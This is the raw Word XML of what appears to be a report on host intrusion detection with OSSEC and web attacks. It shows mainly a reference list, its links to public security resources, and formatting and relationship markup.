    <w:p w14:paraId="32FE1551" w14:textId="5884A4EF" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="73B83CDD" w14:textId="7E03D488" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>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US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc114777217"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="144C5E46" w14:textId="50C94F7D" w:rsidR="002725F1" w:rsidRPr="00A73FE2" w:rsidRDefault="002725F1" w:rsidP="002725F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-U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109"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561726EF" w:rsidR="002725F1" w:rsidRPr="002C1E86"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110" w:history="1">
        <w:r w:rsidRPr="00A73FE2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>https://securityboulevard.com/2020/03/intrusion-detection-systems-a-deep-dive-into-nids-hids/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="513D7C43" w14:textId="50F652DF" w:rsidR="002C1E86" w:rsidRPr="002C1E86" w:rsidRDefault="002C1E86" w:rsidP="002C1E86">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What was WannaCry? | WannaCry Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t>. (n.d.). Malwarebytes. Retrieved September 19, 2022, from https://www.malwarebytes.com/wannacry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A775E7" w14:textId="51FD319C" w:rsidR="002725F1" w:rsidRPr="00F438B8" w:rsidRDefault="002725F1" w:rsidP="002725F1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Tudor, D. (2021, August 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What Is a Host Intrusion Detection System (HIDS) and How It Works</w:t>
      </w:r>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111" w:history="1">
        <w:r w:rsidRPr="00A73FE2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>https://heimdalsecurity.com/blog/host-intrusion-detection-system-hids/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CC9EDC5" w14:textId="77777777" w:rsidR="00F438B8" w:rsidRDefault="00F438B8" w:rsidP="00F438B8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Grow, H. (2021, July 7). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OSSEC Open Source HIDS with Web user interface. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>updated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for Ubuntu 20.04 &amp; OSSEC 3.6.0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HendGrow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Retrieved September 17, 2022, from https://hendgrow.com/2020/10/01/ossec-open-source-hids-with-web-user-interface-updated-for-ubuntu-20-04-ossec-3-6-0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79651658" w14:textId="4CCF6C83" w:rsidR="00F438B8" w:rsidRDefault="00556CE9" w:rsidP="00556CE9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What are Computer Viruses? | Definition &amp; Types of Computer Viruses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. (n.d.). Fortinet. Retrieved September 18, 2022, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:anchor=":%7E:text=A%20computer%20virus%20is%20a,in%20data%20loss%20and%20leakage" w:history="1">
        <w:r w:rsidR="00EE7C20" w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.fortinet.com/resources/cyberglossary/computer-virus#:%7E:text=A%20computer%20virus%20is%20a,in%20data%20loss%20and%20leakage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC52EA3" w14:textId="5F66B5B2" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. (n.d.). Retrieved September 21, 2022, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="00AB1127" w:rsidRPr="008F1846">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="308FED7F" w14:textId="77777777" w:rsidR="00AB1127" w:rsidRDefault="00AB1127" w:rsidP="00AB1127">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP Top Ten | OWASP Foundation</w:t>
      </w:r>
      <w:r>
        <w:t>. (n.d.). Retrieved September 22, 2022, from https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514A879" w14:textId="77777777" w:rsidR="00AB1127" w:rsidRDefault="00AB1127" w:rsidP="00AB1127">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511A3AC7" w14:textId="77777777" w:rsidR="00EE7C20" w:rsidRPr="00556CE9" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>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0294" w14:textId="77777777" w:rsidR="001054C1" w:rsidRDefault="001054C1" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="377DC263" w14:textId="77777777" w:rsidR="001054C1" w:rsidRDefault="001054C1"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267E" w14:textId="77777777" w:rsidR="001054C1" w:rsidRDefault="001054C1" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E786739" w14:textId="77777777" w:rsidR="001054C1" w:rsidRDefault="001054C1"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2D2969"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FF8DE34"/>
    <w:lvl w:ilvl="0" w:tplc="C59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906FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50BCAC92"/>
    <w:lvl w:ilvl="0" w:tplc="684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255101"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="963056C6"/>
    <w:lvl w:ilvl="0" w:tplc="5B7C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F7DA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37D8A30E"/>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402F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58D2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4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1564438774">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="645158986">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1112478449">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1367681353">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="624894024">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1675263311">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="64765147">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="41755761">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1412846859">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1053771558">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1387921412">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1179661771">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="797921329">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1226910661">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="58873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0253B"/>
    <w:rsid w:val="00026CBC"/>
    <w:rsid w:val="00027F95"/>
    <w:rsid w:val="00035369"/>
    <w:rsid w:val="0003629F"/>
    <w:rsid w:val="00037691"/>
    <w:rsid w:val="000441AC"/>
    <w:rsid w:val="0005005E"/>
    <w:rsid w:val="000576F2"/>
    <w:rsid w:val="000752C7"/>
    <w:rsid w:val="00075BF0"/>
    <w:rsid w:val="00077604"/>
    <w:rsid w:val="000A5D56"/>
    <w:rsid w:val="000B33BC"/>
    <w:rsid w:val="000B48E6"/>
    <w:rsid w:val="000B5302"/>
    <w:rsid w:val="000C5B5B"/>
    <w:rsid w:val="000D4482"/>
    <w:rsid w:val="000D5055"/>
    <w:rsid w:val="000E1E97"/>
    <w:rsid w:val="000F3881"/>
    <w:rsid w:val="001022E9"/>
    <w:rsid w:val="001054C1"/>
    <w:rsid w:val="00114552"/>
    <w:rsid w:val="00141090"/>
    <w:rsid w:val="0015482D"/>
    <w:rsid w:val="001549F8"/>
    <w:rsid w:val="00163894"/>
    <w:rsid w:val="00164FA7"/>
    <w:rsid w:val="00182C69"/>
    <w:rsid w:val="00187809"/>
    <w:rsid w:val="001C2206"/>
    <w:rsid w:val="001E1C59"/>
    <w:rsid w:val="001E5E2D"/>
    <w:rsid w:val="0021069F"/>
    <w:rsid w:val="00223824"/>
    <w:rsid w:val="002275B2"/>
    <w:rsid w:val="002478A0"/>
    <w:rsid w:val="002512B5"/>
    <w:rsid w:val="0026715F"/>
    <w:rsid w:val="002673D9"/>
    <w:rsid w:val="002725F1"/>
    <w:rsid w:val="00272610"/>
    <w:rsid w:val="00283E33"/>
    <w:rsid w:val="002A180A"/>
    <w:rsid w:val="002A3A42"/>
    <w:rsid w:val="002C1E86"/>
    <w:rsid w:val="002C7ADD"/>
    <w:rsid w:val="002F50A8"/>
    <w:rsid w:val="002F5466"/>
    <w:rsid w:val="00321D15"/>
    <w:rsid w:val="0032352E"/>
    <w:rsid w:val="0033795E"/>
    <w:rsid w:val="0034184C"/>
    <w:rsid w:val="003447C4"/>
    <w:rsid w:val="003464A1"/>
    <w:rsid w:val="003574AF"/>
    <w:rsid w:val="0037392E"/>
    <w:rsid w:val="0037767F"/>
    <w:rsid w:val="00385FC2"/>
    <w:rsid w:val="003A6D48"/>
    <w:rsid w:val="003A7FDF"/>
    <w:rsid w:val="003B5C0B"/>
    <w:rsid w:val="003D14D0"/>
    <w:rsid w:val="0041017F"/>
    <w:rsid w:val="00412D22"/>
    <w:rsid w:val="00421E7B"/>
    <w:rsid w:val="0045353E"/>
    <w:rsid w:val="00490A30"/>
    <w:rsid w:val="004978C6"/>
    <w:rsid w:val="004A39E9"/>
    <w:rsid w:val="004A6BEC"/>
    <w:rsid w:val="004C3677"/>
    <w:rsid w:val="004C38BB"/>
    <w:rsid w:val="004C5424"/>
    <w:rsid w:val="004D2B19"/>
    <w:rsid w:val="004D7659"/>
    <w:rsid w:val="004E4F8D"/>
    <w:rsid w:val="004E7C9A"/>
    <w:rsid w:val="004F4AF6"/>
    <w:rsid w:val="005124E2"/>
    <w:rsid w:val="00523BEF"/>
    <w:rsid w:val="00523F8D"/>
    <w:rsid w:val="005303BE"/>
    <w:rsid w:val="00531F31"/>
    <w:rsid w:val="005325E0"/>
    <w:rsid w:val="005376FD"/>
    <w:rsid w:val="0054016E"/>
    <w:rsid w:val="0054284C"/>
    <w:rsid w:val="0055244E"/>
    <w:rsid w:val="0055541D"/>
    <w:rsid w:val="005559DD"/>
    <w:rsid w:val="00556CE9"/>
    <w:rsid w:val="005669E8"/>
    <w:rsid w:val="00567C52"/>
    <w:rsid w:val="005751E7"/>
    <w:rsid w:val="005A3B83"/>
    <w:rsid w:val="005A613F"/>
    <w:rsid w:val="005D555B"/>
    <w:rsid w:val="005D793B"/>
    <w:rsid w:val="005F0A5C"/>
    <w:rsid w:val="0060252C"/>
    <w:rsid w:val="00607F8A"/>
    <w:rsid w:val="00615DE6"/>
    <w:rsid w:val="0063452A"/>
    <w:rsid w:val="00634C6F"/>
    <w:rsid w:val="00635638"/>
    <w:rsid w:val="00667FE8"/>
    <w:rsid w:val="006765E0"/>
    <w:rsid w:val="0068665A"/>
    <w:rsid w:val="006921D2"/>
    <w:rsid w:val="00693CC2"/>
    <w:rsid w:val="006B21C7"/>
    <w:rsid w:val="006B598E"/>
    <w:rsid w:val="006B6DB3"/>
    <w:rsid w:val="006C3E5D"/>
    <w:rsid w:val="006D2153"/>
    <w:rsid w:val="006D41D6"/>
    <w:rsid w:val="006D7616"/>
    <w:rsid w:val="006E0449"/>
    <w:rsid w:val="006F531D"/>
    <w:rsid w:val="00702A15"/>
    <w:rsid w:val="00726408"/>
    <w:rsid w:val="007340EA"/>
    <w:rsid w:val="007512F8"/>
    <w:rsid w:val="007531C6"/>
    <w:rsid w:val="00772DFA"/>
    <w:rsid w:val="00773220"/>
    <w:rsid w:val="00782BA9"/>
    <w:rsid w:val="00786AE6"/>
    <w:rsid w:val="0079457A"/>
    <w:rsid w:val="00795531"/>
    <w:rsid w:val="007C322B"/>
    <w:rsid w:val="007D17C9"/>
    <w:rsid w:val="007D75B0"/>
    <w:rsid w:val="007E68C4"/>
    <w:rsid w:val="007E69FF"/>
    <w:rsid w:val="007E7C09"/>
    <w:rsid w:val="007F2BF7"/>
    <w:rsid w:val="00806448"/>
    <w:rsid w:val="008359B7"/>
    <w:rsid w:val="008420E6"/>
    <w:rsid w:val="00846024"/>
    <w:rsid w:val="00860960"/>
    <w:rsid w:val="008626F8"/>
    <w:rsid w:val="008634D0"/>
    <w:rsid w:val="0087543D"/>
    <w:rsid w:val="00881CA3"/>
    <w:rsid w:val="00894976"/>
    <w:rsid w:val="008B0563"/>
    <w:rsid w:val="008B2DEC"/>
    <w:rsid w:val="008D075F"/>
    <w:rsid w:val="008E1B51"/>
    <w:rsid w:val="008F1777"/>
    <w:rsid w:val="008F4E24"/>
    <w:rsid w:val="009107C8"/>
    <w:rsid w:val="00922CAF"/>
    <w:rsid w:val="00947003"/>
    <w:rsid w:val="0094742F"/>
    <w:rsid w:val="0095033A"/>
    <w:rsid w:val="009634F7"/>
    <w:rsid w:val="009903D8"/>
    <w:rsid w:val="009933D5"/>
    <w:rsid w:val="009A5302"/>
    <w:rsid w:val="009C6349"/>
    <w:rsid w:val="009D132A"/>
    <w:rsid w:val="009D6DD5"/>
    <w:rsid w:val="009E072A"/>
    <w:rsid w:val="00A04E1F"/>
    <w:rsid w:val="00A15DF8"/>
    <w:rsid w:val="00A40D93"/>
    <w:rsid w:val="00A41477"/>
    <w:rsid w:val="00A43ABC"/>
    <w:rsid w:val="00A447F1"/>
    <w:rsid w:val="00A6748B"/>
    <w:rsid w:val="00A73FE2"/>
    <w:rsid w:val="00AB1127"/>
    <w:rsid w:val="00AB52F3"/>
    <w:rsid w:val="00AB5F19"/>
    <w:rsid w:val="00AC2210"/>
    <w:rsid w:val="00AE58E2"/>
    <w:rsid w:val="00B05ED2"/>
    <w:rsid w:val="00B0687C"/>
    <w:rsid w:val="00B2488F"/>
    <w:rsid w:val="00B4057B"/>
    <w:rsid w:val="00B44618"/>
    <w:rsid w:val="00B532A1"/>
    <w:rsid w:val="00B548A8"/>
    <w:rsid w:val="00B656EA"/>
    <w:rsid w:val="00B83FB4"/>
    <w:rsid w:val="00BA0779"/>
    <w:rsid w:val="00BA0EEB"/>
    <w:rsid w:val="00BA3ABD"/>
    <w:rsid w:val="00BA559D"/>
    <w:rsid w:val="00BA796E"/>
    <w:rsid w:val="00BD0697"/>
    <w:rsid w:val="00BF44AE"/>
    <w:rsid w:val="00C15A89"/>
    <w:rsid w:val="00C5773E"/>
    <w:rsid w:val="00C64063"/>
    <w:rsid w:val="00C64202"/>
    <w:rsid w:val="00C653EA"/>
    <w:rsid w:val="00C67419"/>
    <w:rsid w:val="00C8356F"/>
    <w:rsid w:val="00C85B2C"/>
    <w:rsid w:val="00C87697"/>
    <w:rsid w:val="00C9116B"/>
    <w:rsid w:val="00CA7170"/>
    <w:rsid w:val="00CD17BB"/>
    <w:rsid w:val="00CD3072"/>
    <w:rsid w:val="00CE19DB"/>
    <w:rsid w:val="00CF2415"/>
    <w:rsid w:val="00CF739A"/>
    <w:rsid w:val="00D0186C"/>
    <w:rsid w:val="00D14341"/>
    <w:rsid w:val="00D227BE"/>
    <w:rsid w:val="00D33C0B"/>
    <w:rsid w:val="00D537C6"/>
    <w:rsid w:val="00D56067"/>
    <w:rsid w:val="00D7708B"/>
    <w:rsid w:val="00D95D5E"/>
    <w:rsid w:val="00DA34CB"/>
    <w:rsid w:val="00DB007A"/>
    <w:rsid w:val="00DD3B43"/>
    <w:rsid w:val="00DD7EE9"/>
    <w:rsid w:val="00DE2C41"/>
    <w:rsid w:val="00E06B08"/>
    <w:rsid w:val="00E26FC0"/>
    <w:rsid w:val="00E459AB"/>
    <w:rsid w:val="00E53E5C"/>
    <w:rsid w:val="00E67820"/>
    <w:rsid w:val="00E86C6E"/>
    <w:rsid w:val="00EA41A4"/>
    <w:rsid w:val="00EB31A3"/>
    <w:rsid w:val="00EB777E"/>
    <w:rsid w:val="00EC00CE"/>
    <w:rsid w:val="00ED1CCE"/>
    <w:rsid w:val="00ED5786"/>
    <w:rsid w:val="00ED750D"/>
    <w:rsid w:val="00ED780B"/>
    <w:rsid w:val="00EE7C20"/>
    <w:rsid w:val="00F00342"/>
    <w:rsid w:val="00F01C26"/>
    <w:rsid w:val="00F04227"/>
    <w:rsid w:val="00F060E3"/>
    <w:rsid w:val="00F31C59"/>
    <w:rsid w:val="00F351FA"/>
    <w:rsid w:val="00F40DEA"/>
    <w:rsid w:val="00F42E4A"/>
    <w:rsid w:val="00F438B8"/>
    <w:rsid w:val="00F45DAB"/>
    <w:rsid w:val="00F63CCB"/>
    <w:rsid w:val="00F935E5"/>
    <w:rsid w:val="00FA2180"/>
    <w:rsid w:val="00FB033B"/>
    <w:rsid w:val="00FB4BB5"/>
    <w:rsid w:val="00FC36F7"/>
    <w:rsid w:val="00FD42C1"/>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574AF"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="008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104424050">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="169679820">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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467086809">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0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331761265">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1228343820">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1317607911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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769084102">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1899632070">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farunix.com/install-ossec-hids-agent-on-ubuntu-20-04/"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hyperlink" Target="https://www.fortinet.com/resources/cyberglossary/computer-virus" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/c/H"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yperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/Intruder/command_exec.txt" TargetMode="External"/><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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.10.2/ossec-wui"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hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="Externa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mailto:student@192.168.234.2"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hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.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5.jpeg"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/c/PowerCertAnimatedVideos" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/coreruleset/coreruleset.git"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thub.com/ossec/ossec-hids" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.1145/1290958.1290968" TargetMode="Externa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hyperlink" Target="https://www.ettercap-project.org/"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s://updates.atomicorp.com/channels/atomic/windows/ossec-agent-win32-3.6.0-12032.exe"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hyperlink" Target="https://securityboulevard.com/2020/03/intrusion-detection-systems-a-deep-dive-into-nids-hids/" TargetMode="External"/><Relationship Id="rId115"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hyperlink" Target="https://www.bettercap.org/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tryhackme.com" TargetMode="Externa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portswigger.net/web-security/cross-site-scripting/cheat-sheet"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hyperlink" Target="https://heimdalsecurity.com/blog/host-intrusion-detection-system-hi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71</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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-06T14:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-22T23:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>